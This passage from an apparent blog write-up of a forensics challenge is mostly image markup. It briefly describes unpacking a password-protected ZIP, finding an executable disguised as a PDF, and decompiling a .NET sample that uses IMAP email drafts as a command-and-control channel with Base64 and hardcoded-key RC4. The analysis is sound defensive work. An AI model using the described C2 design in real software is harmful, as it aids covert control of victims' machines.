https://substackcdn.com/image/fetch/$s_!o4Im!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png 1272w, https://substackcdn.com/image/fetch/$s_!o4Im!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!o4Im!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png" width="1456" height="607" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:607,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:310811,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.byteberzerker.com/i/159574134?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!o4Im!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png 424w, https://substackcdn.com/image/fetch/$s_!o4Im!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png 848w, https://substackcdn.com/image/fetch/$s_!o4Im!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png 1272w, https://substackcdn.com/image/fetch/$s_!o4Im!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1c3a343-f145-4e54-ac2c-1362c0ec655c_1958x816.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!d2e5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!d2e5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png 424w, https://substackcdn.com/image/fetch/$s_!d2e5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png 848w, https://substackcdn.com/image/fetch/$s_!d2e5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png 1272w, https://substackcdn.com/image/fetch/$s_!d2e5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!d2e5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png" width="694" height="844" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/eeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:844,&quot;width&quot;:694,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:92490,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.byteberzerker.com/i/159574134?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!d2e5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png 424w, https://substackcdn.com/image/fetch/$s_!d2e5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png 848w, https://substackcdn.com/image/fetch/$s_!d2e5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png 1272w, https://substackcdn.com/image/fetch/$s_!d2e5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feeabdc64-d00c-4efa-882e-025de05c2e2f_694x844.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><p><strong>3. Artifact Inspection</strong></p></li></ul><p><strong>ZIP File:</strong></p><ul><li><p>The ZIP file labeled <em>Eldoria</em> was <strong>password protected</strong>.</p></li><li><p>A related HTML file revealed the <strong>password</strong>.</p><p></p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7CWp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7CWp!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png 424w, https://substackcdn.com/image/fetch/$s_!7CWp!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png 848w, https://substackcdn.com/image/fetch/$s_!7CWp!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png 1272w, https://substackcdn.com/image/fetch/$s_!7CWp!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7CWp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png" width="1456" height="576" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:576,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7CWp!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png 424w, https://substackcdn.com/image/fetch/$s_!7CWp!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png 848w, https://substackcdn.com/image/fetch/$s_!7CWp!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png 1272w, https://substackcdn.com/image/fetch/$s_!7CWp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85df4de3-5e81-4d5e-99cf-ceae37333f06_2028x802.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Suspicious PDF:</strong></p><ul><li><p>Unzipped file was <strong>not a PDF</strong>, but an executable disguised with a .pdf extension.</p></li><li><p>Opened in <strong>PEStudio</strong> &#8211; confirmed malware.</p></li><li><p>Origin IP: <strong>192.168.91.133</strong></p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!PfsB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!PfsB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png 424w, https://substackcdn.com/image/fetch/$s_!PfsB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png 848w, https://substackcdn.com/image/fetch/$s_!PfsB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png 1272w, https://substackcdn.com/image/fetch/$s_!PfsB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!PfsB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png" width="631" height="569" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:569,&quot;width&quot;:631,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!PfsB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png 424w, https://substackcdn.com/image/fetch/$s_!PfsB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png 848w, https://substackcdn.com/image/fetch/$s_!PfsB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png 1272w, https://substackcdn.com/image/fetch/$s_!PfsB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20b3eb14-87b3-4876-a41f-572c546e2261_631x569.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>4. Malware Analysis</strong></p><ul><li><p>Identified malware as a <strong>.NET executable</strong>.</p></li><li><p>Decompiled using <strong>JetBrains dotPeek</strong>.</p></li><li><p>Malware (named email.exe) included an <strong>IMAP C2 channel</strong>.</p></li><li><p>Key logic in imap_chanel.Program:</p><ul><li><p>Parses .eml drafts</p></li><li><p>Decodes <strong>Base64</strong> payloads</p></li><li><p>Decrypts using <strong>RC4</strong> with a hardcoded key</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!TzCA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!TzCA!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png 424w, https://substackcdn.com/image/fetch/$s_!TzCA!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png 848w, https://substackcdn.com/image/fetch/$s_!TzCA!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png 1272w, https://substackcdn.com/image/fetch/$s_!TzCA!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!TzCA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png" width="622" height="616" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:616,&quot;width&quot;:622,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:43301,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.byteberzerker.com/i/159574134?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!TzCA!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png 424w, https://substackcdn.com/image/fetch/$s_!TzCA!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png 848w, https://substackcdn.com/image/fetch/$s_!TzCA!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png 1272w, https://substackcdn.com/image/fetch/$s_!TzCA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4db439cc-35ac-4e7f-a38b-1a7ae61a9249_622x616.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8t7f!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8t7f!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png 424w, https://substackcdn.com/image/fetch/$s_!8t7f!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png 848w, https://substackcdn.com/image/fetch/$s_!8t7f!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png 1272w, https://substackcdn.com/image/fetch/$s_!8t7f!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8t7f!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png" width="464" height="620" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:620,&quot;width&quot;:464,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8t7f!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png 424w, https://substackcdn.com/image/fetch/$s_!8t7f!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png 848w, https://substackcdn.com/image/fetch/$s_!8t7f!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png 1272w, https://substackcdn.com/image/fetch/$s_!8t7f!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0cc807dd-dea2-4d47-b7cd-83ffecd9ad9f_464x620.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div 